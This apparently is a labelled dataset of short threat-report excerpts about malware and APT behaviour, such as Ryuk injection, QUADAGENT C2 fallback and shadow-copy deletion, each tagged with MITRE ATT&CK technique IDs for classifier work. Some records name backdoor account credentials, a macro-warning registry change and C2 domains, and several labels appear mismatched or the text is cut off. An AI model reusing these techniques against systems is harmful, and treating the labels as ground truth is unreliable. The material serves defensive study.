{"text1":"The macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). It has very similar functionality to the Windows version","labels":"['T1553.002']"}
|
|
{"text1":"Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. It takes no action if the adjustment of the token privileges fails. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process","labels":"['T1134']"}
|
|
{"text1":"Each user on a Mac can have a LaunchAgents folder in their own Library folder to specify code that should be run every time that user logs in. We can confirm this is the case with Green Lambert by running the implant, then checking the user\u2019s LaunchAgents folder","labels":"['T1543.001']"}
|
|
{"text1":"In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans","labels":"['T1057']"}
|
|
{"text1":"The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems","labels":"['T1053.005', 'T1053', 'T1053.005']"}
|
|
{"text1":"This variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the label \"C:\\\" and the computer name. The main function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number that the sub-function uses as a case within a switch statement to decrypt the desired string. The main function then calls the subfunction with the argument 3 to get the POST data parameter (\u201cporg\u201d) along with the volume serial number and computer name and will send this data to the C2 via the HTTP POST request. The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \"open\" function using the ShellExecuteW API function. Also, the author capitalized the \u201cE\u201d in the \u201cdde\u201d command to evade case sensitive signatures. Lastly, the author bolded the \u201cdd\u201d characters within the \u201cdde\u201d command, which breaks the string up within the XML of the DOCX file (word\/document.xml) to make signature development difficult, as seen here","labels":"['T1082']"}
|
|
{"text1":"The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL","labels":"['T1082']"}
|
|
{"text1":"The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh keys and known hosts if they are available to infect other machines","labels":"['T1552.004']"}
|
|
{"text1":"Next, HyperStack uses a custom handshake that is similar to handshakes used for Carbon named-pipe communications. To detect incoming connections from the controller, the HyperStack implant uses the Windows API call \u2018ConnectNamedPipe\u2019. When HyperStack receives an incoming connection, it starts a new thread and continues with the custom handshake. If it matches, the HyperStack implant returns the value CACA05ACCE55F11E to the controller","labels":"['T1106']"}
|
|
{"text1":"The document may also display the fake message \u201cThis document is protected\u201d to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system","labels":"['T1204.002']"}
|
|
{"text1":"The strings pertaining to the ransomware are encrypted and stored in the .bss section of the binary file. This includes the ransom note along with other important information necessary for the ransomware\u2019s tasks. The strings are decrypted using a key that combined the size and raw address of the .bss section, as well as the ransomware\u2019s compilation timestamp","labels":"['T1027']"}
|
|
{"text1":"GALLIUM predominantly uses widely available tools. In certain instances, GALLIUM has modified these tools to add additional functionality. However, it\u2019s likely these modifications have been made to subvert antimalware solutions since much of the malware and tooling employed by GALLIUM is historic and is widely detected by security products. For example, QuarkBandit is a modified version of the widely used Gh0st RAT, an openly available remote access tool (RAT). Similarly, GALLIUM has made use of a modified version of the widely available Poison Ivy RAT. These RATs and the China Chopper web shell form the basis of GALLIUM\u2019s toolkit for maintaining access to a victim network","labels":"['T1588.002']"}
|
|
{"text1":"For Linux Rabbit to establish a connection with the C2 server, it utilizes Tor hidden services to act as contact points to access a Tor gateway. The malware will randomly select one of the hidden services and then a Tor gateway to follow in order to establish an active C2 URL. The payload for the malware is then sent from the C2 server as an encoded URL parameter","labels":"['T1132']"}
|
|
{"text1":"ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB, HTTP, WCF and RAW Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc. The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy. karmaSMB.py: A SMB Server that answers specific file contents regardless of the SMB share and pathname specified. smbserver.py: A Python implementation of an SMB server","labels":"['T1557.001']"}
|
|
{"text1":"Moreover, USBWorm uses an icon that mimics a Windows directory, tricking the user into executing the malware when trying to access a directory","labels":"['T1036.005']"}
|
|
{"text1":"A string, that contains a PDB-path to debug symbols, suggests one such tool was named CredRaptor by the attackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer, Mozilla Firefox, and Opera","labels":"['T1555.003']"}
|
|
{"text1":"In the case of a Linux\/Ebury backdoor connection, the\u00a0<version>\u00a0contains a hexadecimal string of twenty-two (22) characters or more. It embeds an eleven (11) character password that is first encrypted with the client IP address and then encoded as a hexadecimal string; optionally a four (4) byte command may be encrypted and encoded as well after the password","labels":"['T1573.001']"}
|
|
{"text1":"Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated with suspected persistent threat actor MuddyWater. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs. In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field","labels":"['T1104']"}
|
|
{"text1":"Most of CARBANAK\u2019s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool","labels":"['T1573.001']"}
|
|
{"text1":"The wrapper JAR file drops a secondary JAR file and copies it to a %Temp% location. The payload JAR file can be extracted using AES decryption. The first 16 bytes in the file \u201ck\u201d seen in Figure 4 contains the key and the file \u201ce\u201d is the encrypted Java payload","labels":"['T1027']"}
|
|
{"text1":"29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly","labels":"['T1112']"}
|
|
{"text1":"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. Get Microsoft Version Number from the registry, specifically from reg key\/value:\u00a0HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1","labels":"['T1112']"}
|
|
{"text1":"The anti-detection launcher and decompressor make extensive use of Metasploit\u2019s shikata_ga_nai encoder as well as LZNT1 compression","labels":"['T1140']"}
|
|
{"text1":"Based on the use of the relatively unique PLAINTEE malware, the malware\u2019s use of the same file paths on in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker. Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document. By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious\u2019 codes small footprint can help enable evasion of automated detection mechanisms based on macro content","labels":"['T1204.002']"}
|
|
{"text1":"The QUADAGENT backdoors dropped onto the hosts were nearly identical to each other, with the only differences being the command and control server (C2) and randomized obfuscation. We were also able to locate a third delivery package of the QUADAGENT backdoor as reported by ClearSky Cyber Security. In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails","labels":"['T1059.003']"}
|
|
{"text1":"In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1","labels":"['T1059.003']"}
|
|
{"text1":"1) The printer vulnerability MS10-061 exploited by Stuxnet \u2013 using a special MOF file, executed on the attacked system using WMI","labels":"['T1136.001']"}
|
|
{"text1":"Endpoint Protection . Patchwork cyberespionage group expands targets from governments to wide range of industries . The Patchwork attack group has been targeting more than just government-associated organizations. Symantec Security Response has been actively monitoring Patchwork, also known as Dropping Elephant, which uses Chinese-themed content as bait to compromise its targets\u2019 networks. A customized website with content related to the Chinese military . The malicious sites link to files hosted on different domains, which appear to be solely used for malicious purposes. The PowerPoint files appear to exploit the Microsoft Windows OLE Package Manager Remote Code Execution Vulnerability (CVE-2014-4114), which was used in the Sandworm attacks against American and European targets in October 2014. The rich text files typically attempt to exploit the Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641), which was patched in April 2015. Users should manually remove any potential dropped files which would typically be named \u201csysvolinfo.exe\u201d. Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok. As two file types are used to deliver two different payloads, there are likely multiple individuals or groups contributing to the malware development efforts. Mitigation Users should adhere to the following advice to prevent Patchwork\u2019s attacks from succeeding: - Delete any suspicious-looking emails you receive, especially if they contain links or attachments. Spear-phishing emails are frequently used by cyberespionage attackers as a means of luring victims into opening malicious files","labels":"['T1566.002']"}
|
|
{"text1":"The configuration, along with downloaded plugins and all harvested data are stored in a custom database format inside a single file under the %TEMP% directory. The file name is hardcoded and obfuscated with XOR. The storage file is encrypted with AES-256 using a hardcoded key and is decrypted each time the malware needs to read or write it and re-encrypted after new data is added","labels":"['T1070.004']"}
|
|
{"text1":"After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection","labels":"['T1070.005']"}
|
|
{"text1":"Targets common cloud applications such as web servers for initial access, using known vulnerabilities (\u201c1-days\u201d) \u2013 presumably those with a working exploit in the wild. Uses Windows container escape techniques to escape the container and gain code execution on the underlying node. Connects to its C2 server using the IRC protocol over the Tor network","labels":"['T1190']"}
|
|
{"text1":"Intelligence gathering and stealing information has generally been the motivation behind Cicada\u2019s attacks in the past, and that would appear to be the case in this attack campaign too. We observed the attackers archiving some folders of interest in these attacks, including in one organization folders relating to human resources (HR), audit and expense data, and meeting memos","labels":"['T1083']"}
|
|
{"text1":"The actors behind this campaign gained access to numerous public and private organizations around the world. They gained access to victims via trojanized updates to SolarWind\u2019s Orion IT monitoring and management software","labels":"['T1195.002']"}
|
|
{"text1":"The macros are also responsible for achieving reboot persistence for the ObliqueRAT payloads. This is done by creating a shortcut (.url file extension) in the infected user's Startup directory. Malicious shortcut in the infected user's startup directory to execute ObliqueRAT on startup","labels":"['T1547.001']"}
|
|
{"text1":"Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10","labels":"['T1036.004']"}
|
|
{"text1":"It will then resolve the current process\u2019s PID and path to be used as script arguments, and proceeds to execute the script by running: \/bin\/sh -c .\/update.sh <process_id> <process_path","labels":"['T1083']"}
|
|
{"text1":"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information","labels":"['T1027']"}
|
|
{"text1":"The \u2018jli.dll\u2019 file acts as the first layer of the Ecipekac loader. This DLL file has a number of export functions; however, all of them refer to a similar function that carries the main loading feature","labels":"['T1574.002']"}
|
|
{"text1":"Siloscape searches for kubectl.exe by name and the config file using a regular expression. The search function takes an extra argument: a pointer to a vector that holds folder names to exclude from the search","labels":"['T1083']"}
|
|
{"text1":"We believe the malware authors chose to send packets that look like legitimate DNS requests over UDP port 53 to avoid being blocked by firewalls. It is very common to whitelist DNS requests in firewall configurations because blocking them could disrupt name resolution","labels":"['T1071.004']"}
|
|
{"text1":"At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations","labels":"['T1036.005']"}
|
|
{"text1":"Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process. It moves wiper-related files to \u201cC:\\temp\u201d and creates a scheduled task named mstask to execute the wiper only once at 23:55:00","labels":"['T1490']"}
|
|
{"text1":"Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin\u2019s configured list. In this particular instance, the malware will seek out the following file types","labels":"['T1119']"}
|
|
{"text1":"The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system","labels":"['T1059.003']"}
|
|
{"text1":"Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information","labels":"['T1082']"}
|
|
{"text1":"The image displayed to the user after mounting the DMG appears to be the \u201cInstall\u201d file. In actuality, it is just a system link that points to the 1302.app application bundle, or the malicious application itself. By double-clicking the \u201cInstall\u201d image in Figure C, the system actually executes the 1302.app, where 1302.app\/Contents\/MacOS\/1302 is just a bash script","labels":"['T1553.001']"}
|
|
{"text1":"netbook or inexpensive laptop - Raspberry Pi computer - Bash Bunny, a special tool for carrying out USB attacks","labels":"['T1200']"}
|
|
{"text1":"The malware has the ability to regularly take screenshots; what\u2019s more, it takes screenshots when certain \u201cinteresting\u201d applications are run, for instance, IM\u2019s. Screenshots are stored in compressed format and are regularly sent to the C&C server \u2013 just like the audio recordings","labels":"['T1113']"}
|
|
{"text1":"To capture login credentials from all the previously listed websites, Javali monitors processes to find open browsers or custom banking applications. The most common web browsers thus monitored are Mozilla Firefox, Google Chrome, Internet Explorer and Microsoft Edge","labels":"['T1057', 'T1555.003']"}
|
|
{"text1":"The information collected is performed using WMI queries: Additionally the malware lists the running process via the Microsoft Windows API. The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data","labels":"['T1057']"}
|
|
{"text1":"This recent campaign used malicious documents to install malware on the targeted system using a template injection attack. This technique allows a weaponized document to download an external Word template containing macros that will be executed. This is a known trick used to bypass static malicious document analysis, as well as detection, as the macros are embedded in the downloaded template","labels":"['T1059.005']"}
|
|
{"text1":"The SUPERNOVA webshell is an anonymous code C# webshell written in .NET C# that is specifically written for usage on SolarWinds Orion servers","labels":"['T1071.001']"}
|
|
{"text1":"1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign","labels":"['T1140']"}
|
|
{"text1":"The group has made significant improvements to their arsenal recently and has both developed new tools and modified existing ones. The key observations covered below are based on CrowdStrike\u00ae Intelligence analysis of BazarLoader, Conti and Ryuk operations","labels":"['T1486']"}
|
|
{"text1":"After the last screenshot was created, it uploads all files from the \"store\" folder to the C2 server \"win-restore[.]ru\". Then, it deletes all the files present in the folder and starts a new screenshot creation cycle. It should be noted that there is no check of what files are uploaded. The files are uploaded via POST HTTP method to the script \"vvd.php\". For this, the following HTTP request is used which contains also data from the victim as well the JPEG files","labels":"['T1074.001']"}
|
|
{"text1":"The ransomware terminates some processes and services, some examples of which are related to backup software and data related applications. It is likely that it does this as an attempt to debilitate any efforts the victim may take in performing backup and recovery operations after the ransomware attack","labels":"['T1489']"}
|
|
{"text1":"The script hides under multiple layers of encryption, obfuscation, and encoding techniques. For this sample, we were able to reveal three layers of code. The top-most layer executes a base64-encoded command","labels":"['T1027']"}
|
|
{"text1":"CrowdStrike also identified a connection between StellarParticle-related campaigns and the abuse of Microsoft Cloud Solution Partners\u2019 O365 tenants. This threat actor abused access to accounts in the Cloud Solution Partner\u2019s environment with legitimate delegated administrative privileges to then gain access to several customers\u2019 O365 environments","labels":"['T1199']"}
|
|
{"text1":"Malware used by the threat group can be configured to bypass network-based detection; however, the threat actors rarely modify host-based configuration settings when deploying payloads. The threat actors demonstrated the ability to adapt when reentering a network after an eviction, overcoming technical barriers constructed by network defenders","labels":"['T1056.001']"}
|
|
{"text1":"In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account","labels":"['T1560.001', 'T1567.002']"}
|
|
{"text1":"TA505 sent several similar campaigns in mid-October with VBScript compressed in 7-Zip files that also downloaded either Locky or The Trick. By late October, the actor switched to Microsoft Word attachments that abused Dynamic Data Exchange (DDE) to download either Locky or Locky and The Trick in several more geo-targeted campaigns. This was the first time that we observed TA505 abusing DDE, a legitimate feature in Microsoft Office that became a regular part of multiple threat actors\u2019 toolkits in Q4 2017. Recipients of these emails, which also used simple lures with attached fake invoices, needed to open the Microsoft Word attachments and click through a security dialog (Figure 3) to download the malware","labels":"['T1204.001']"}
|
|
{"text1":"WannaCry then proceeds to encrypt files on the system, searching for the following file extensions, which are hard-coded in the binary","labels":"['T1083']"}
|
|
{"text1":"The document is disguised from the Colombian National Civil Registry and uses Spanish to prompt the victim to enable the macro code in order to execute the subsequent payload","labels":"['T1204.002']"}
|
|
{"text1":"In addition to these malware families, GALLIUM has been observed employing SoftEther VPN software to facilitate access and maintain persistence to a target network. By installing SoftEther on internal systems, GALLIUM is able to connect through that system as though they are on the internal network of the target. SoftEther provides GALLIUM with another means of persistence and flexibility with the added benefit that its traffic may appear to be benign on the target network","labels":"['T1133']"}
|
|
{"text1":"The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information","labels":"['T1057']"}
|
|
{"text1":"Next, the script executes a command to delete the targeted PC\u2019s volume shadow copies, so victims cannot restore older unencrypted versions of their files","labels":"['T1490']"}
|
|
{"text1":"No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks. The same exploit was used in the ExPetr","labels":"['T1210']"}
|
|
{"text1":"We identified that even though the downloaded installation executable was signed using a valid digital signature issued to Piriform, CCleaner was not the only application that came with the download. During the installation of CCleaner 5.33, the 32-bit CCleaner binary that was included also contained a malicious payload that featured a Domain Generation Algorithm (DGA) as well as hardcoded Command and Control (C2) functionality. We confirmed that this malicious version of CCleaner was being hosted directly on CCleaner's download server as recently as September 11, 2017. In reviewing the Version History page on the CCleaner download site, it appears that the affected version (5.33) was released on August 15, 2017. On September 12, 2017 version 5.34 was released. The version containing the malicious payload (5.33) was being distributed between these dates. This version was signed using a valid certificate that was issued to Piriform Ltd by Symantec and is valid through 10\/10\/2018. Piriform was the company that Avast recently acquired and was the original company who developed the CCleaner software application. This second sample was also signed using a valid digital certificate, however the signing timestamp was approximately 15 minutes after the initial sample was signed. It is also important to note that while previous versions of the CCleaner installer are currently still available on the download server, the version containing the malicious payloads has been removed and is no longer available","labels":"['T1195.002']"}
|
|
{"text1":"Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection","labels":"['T1071.001']"}
|
|
{"text1":"A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain\u2019s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account","labels":"['T1134.005']"}
|
|
{"text1":"The presence of this credential stealer may partially answer how Kobalos propagates. Anyone using the SSH client of a compromised machine will have their credentials captured. Those credentials can then be used by the attackers to install Kobalos on the newly discovered server later","labels":"['T1056']"}
|
|
{"text1":"Extracting and dropping an OpenSSH binary from its PE resources - Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources - Creating a new user \u201csupportaccount\u201d with a password of \u201cGhar4f5\u201d - Adding this user to the \u201cRemote Desktop Users\u201d and \u201cAdministrators\u201d groups","labels":"['T1136.001']"}
|
|
{"text1":"Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective","labels":"['T1003']"}
|
|
{"text1":"1) Creating malicious Word documents by injecting a remote template URL 2) Hosting a C2 server to gather credentials entered into authentication dialog boxes displayed when attempting to obtain the remote template","labels":"['T1221']"}
|
|
{"text1":"As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person","labels":"['T1087.003', 'T1087.002']"}
|
|
{"text1":"As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle\u2019s Resources folder. The dot prefix is added in order to make it invisible in the Finder. This payload is then executed via a user LaunchAgent at ~\/Library\/LaunchAgents\/com.aex-loop.agent.plist","labels":"['T1564.001']"}
|
|
{"text1":"First, the malware goes over the files and directories from the paths_to_wipe config, fills them with zero-bytes instead of their real content, and then deletes them","labels":"['T1485']"}
|
|
{"text1":"The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information. The tool runs the following list of WMI queries","labels":"['T1047']"}
|
|
{"text1":"To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute","labels":"['T1490']"}
|
|
{"text1":"Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates. In December 2019, GOLD SOUTHFIELD began operating a name-and-shame style website that uses stolen data from intrusions to generate additional leverage against victims; a tactic known as double extortion. Despite GOLD SOUTHFIELD's infrastructure being taken down by law enforcement in October 2021, the REvil leak site re-emerged in April 2022 with several new victims added. GOLD SOUTHFIELD also began recruiting exclusively via their leak site using the peer-to-peer secure messaging software Tox Chat. GOLD SOUTHFIELD's affiliates distribute ransomware through a variety of means including exploit kits, scan-and-exploit attacks, publicly-accessible RDP, remote management and monitoring (RMM) servers, and backdoored software installers. As of May 2022, the group continues to operate REvil as a name-and-shame scheme and uses a leak site to post victim information and recruit affiliates","labels":"['T1195.002']"}
|
|
{"text1":"After all this, if the malware successfully discovers a viable target and is able to gain access through SSH credential brute forcing, the malware will be able to begin installation of the cryptocurrency miner. Linux Rabbit attempts to install both \u201cCNRig\u201d and \u201cCoinHive\u201d Monero miners onto the machine, but only one will actually successfully install depending on what type of architecture the machine is. If the machine is a x86-bit, it will install CNRig Monero miner and if the machine is an ARM\/MISP, it will install CoinHive. If the infected machine is a web server, the malware will inject CoinHive script tags into every HTML file, so that even visitors of the site\/server are also infected with the cryptocurrency miner. Linux Rabbit is able to connect to GitHub and receive updates from the threat actors. It also has a killswitch built-in. It is able to detect other miners already on a target machine and delete them from the machine during the installation of its own miner","labels":"['T1110.003']"}
|
|
{"text1":"Next, a Cobalt Strike binary was dropped on the endpoint as a .dll file and executed by rundll32.exe. With that, the intrusion began spreading laterally via Cobalt Strike. The operators used Windows Management Instrumentation (WMI) in their lateral movement attempt. WMI spawned cmd.exe, which subsequently spawned PowerShell with an encoded command line. This encoded PowerShell creates another Cobalt Strike Beacon. We\u2019ve found that looking for encoded PowerShell is a great way to catch this specific evil and a lot of other evil, too. In this incident, we saw a command line that began with","labels":"['T1059.001']"}
|
|
{"text1":"Multiple SUNBURST samples have been recovered, delivering different payloads. In at least one instance the attackers deployed a previously unseen memory-only dropper we\u2019ve dubbed TEARDROP to deploy Cobalt Strike BEACON","labels":"['T1105']"}
|
|
{"text1":"The GetWebpImage() method is in charge of masquerading the output of the C2 commands as a legitimate WebP file (by adding appropriate RIFF\/WebP file header magic\/fields) and encoding the resulting WebP file","labels":"['T1036']"}
|
|
{"text1":"How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM \u00b7 Oct 30, 2019\u00b7Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick","labels":"['T1480.001']"}
|
|
{"text1":"The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools","labels":"['T1027']"}
|
|
{"text1":"When run, the first thing the script does is to retrieve a GUID associated to a LAN connection present on the machine by leveraging the interface offered by the WMI Class Root\\Microsoft\\Homenet\\HNet_Connection. If a LAN connection is not available, the script defaults to a hardcoded GUID. This GUID is later communicated to the C2. It\u2019s possible that the threat actor used this GUID to verify that the threat is running in a desirable environment, i.e. a real machine with LAN connections available","labels":"['T1049']"}
|
|
{"text1":"In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive","labels":"['T1119', 'T1005']"}
|
|
{"text1":"The actors have regularly\u00a0leveraged Cobalt Strike\u00a0BEACON\u00a0and Metasploit Meterpreter to move laterally within victim environments. The actors commonly moved\u00a0laterally within victim environments\u00a0using compromised accounts\u2014both those belonging to regular users and accounts with administrative privileges. In addition to the use of\u00a0common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP\u00a0and SMB protocols. The actors used the Windows\u00a0net use\u00a0command to connect to Windows admin shares to move laterally","labels":"['T1078.002']"}
|
|
